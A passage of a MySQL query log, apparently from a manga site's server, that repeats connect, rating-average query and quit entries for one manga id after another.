using Socket 330637874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330637874 Quit 330637875 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330637875 Quit 330637876 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330637876 Quit 330637877 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330637877 Quit 330637878 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330637878 Quit 330637879 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '155' order by created desc 330637879 Quit 330637880 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330637880 Quit 330637881 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330637881 Quit 330637882 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330637882 Quit 330637883 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330637883 Quit 330637884 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330637884 Quit 330637885 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330637885 Quit 330637886 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330637886 Quit 330637887 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330637887 Quit 330637888 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330637888 Quit 330637889 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330637889 Quit 330637890 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330637890 Quit 330637891 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330637891 Quit 330637892 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330637892 Quit 330637893 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330637893 Quit 330637894 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330637894 Quit 330637895 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330637895 Quit 330637896 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330637896 Quit 330637897 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330637897 Quit 330637898 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330637898 Quit 330637899 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330637899 Quit 330637900 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330637900 Quit 330637901 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330637901 Quit 330637902 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330637902 Quit 330637903 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330637903 Quit 330637904 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330637904 Quit 330637905 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330637905 Quit 330637906 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330637906 Quit 330637907 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330637907 Quit 330637908 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '79' order by created desc 330637908 Quit 330637909 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330637909 Quit 330637910 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330637910 Quit 330637911 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330637911 Quit 330637912 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330637912 Quit 330637913 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330637913 Quit 330637914 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330637914 Quit 330637915 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330637915 Quit 330637916 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330637916 Quit 330637917 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330637917 Quit 330637918 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330637918 Quit 330637919 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330637919 Quit 330637920 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330637920 Quit 330637921 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330637921 Quit 330637922 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330637922 Quit 330637923 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330637923 Quit 330637924 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330637924 Quit 330637925 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330637925 Quit 330637926 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330637926 Quit 330637927 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330637927 Quit 330637928 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330637928 Quit 330637929 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330637929 Quit 330637930 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330637930 Quit 330637931 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330637931 Quit 330637932 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330637932 Quit 330637933 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330637933 Quit 330637934 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330637934 Quit 330637935 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330637935 Quit 330637936 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330637936 Quit 330637937 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330637937 Quit 330637938 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330637938 Quit 330637939 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330637939 Quit 330637940 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330637940 Quit 330637941 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330637941 Quit 330637942 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330637942 Quit 330637943 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330637943 Quit 330637944 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330637944 Quit 330637945 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330637945 Quit 330637946 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330637946 Quit 330637947 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330637947 Quit 330637948 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330637948 Quit 330637949 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330637949 Quit 330637950 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330637950 Quit 330637951 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330637951 Quit 330637952 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330637952 Quit 330637953 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330637953 Quit 330637954 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330637954 Quit 330637955 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330637955 Quit 330637956 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330637956 Quit 330637957 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330637957 Quit 330637958 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330637958 Quit 330637959 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330637959 Quit 330637960 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330637960 Quit 330637961 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330637961 Quit 330637962 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330637962 Quit 330637963 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330637963 Quit 330637964 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330637964 Quit 330637965 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330637965 Quit 330637966 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330637966 Quit 330637967 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330637967 Quit 330637968 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330637968 Quit 330637969 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330637969 Quit 330637970 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330637970 Quit 330637971 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330637971 Quit 330637972 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330637972 Quit 330637973 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330637973 Quit 330637974 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330637974 Quit 330637975 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330637975 Quit 330637976 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330637976 Quit 330637977 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330637977 Quit 330637978 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330637978 Quit 330637979 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330637979 Quit 330637980 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330637980 Quit 330637981 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330637981 Quit 330637982 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330637982 Quit 330637983 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330637983 Quit 330637984 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330637984 Quit 330637985 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330637985 Quit 330637986 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330637986 Quit 330637987 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330637987 Quit 330637988 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330637988 Quit 330637989 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330637989 Quit 330637990 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330637990 Quit 330637991 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330637991 Quit 330637992 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330637992 Quit 330637993 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330637993 Quit 330637994 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330637994 Quit 330637995 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330637995 Quit 330637996 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330637996 Quit 330637997 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330637997 Quit 330637998 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330637998 Quit 330637999 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330637999 Quit 330638000 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330638000 Quit 330638001 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330638001 Quit 330638002 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330638002 Quit 330638003 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330638003 Quit 330638004 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330638004 Quit 330638005 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330638005 Quit 330638006 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330638006 Quit 330638007 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330638007 Quit 330638008 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330638008 Quit 330638009 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330638009 Quit 330638010 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330638010 Quit 330638011 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330638011 Quit 330638012 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330638012 Quit 330638013 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330638013 Quit 330638014 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330638014 Quit 330638015 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330638015 Quit 330638016 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330638016 Quit 330638017 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330638017 Quit 330638018 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330638018 Quit 330638019 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330638019 Quit 330638020 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330638020 Quit 330638021 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330638021 Quit 330638022 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330638022 Quit 330638023 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330638023 Quit 330638024 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330638024 Quit 330638025 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330638025 Quit 330638026 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330638026 Quit 330638027 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 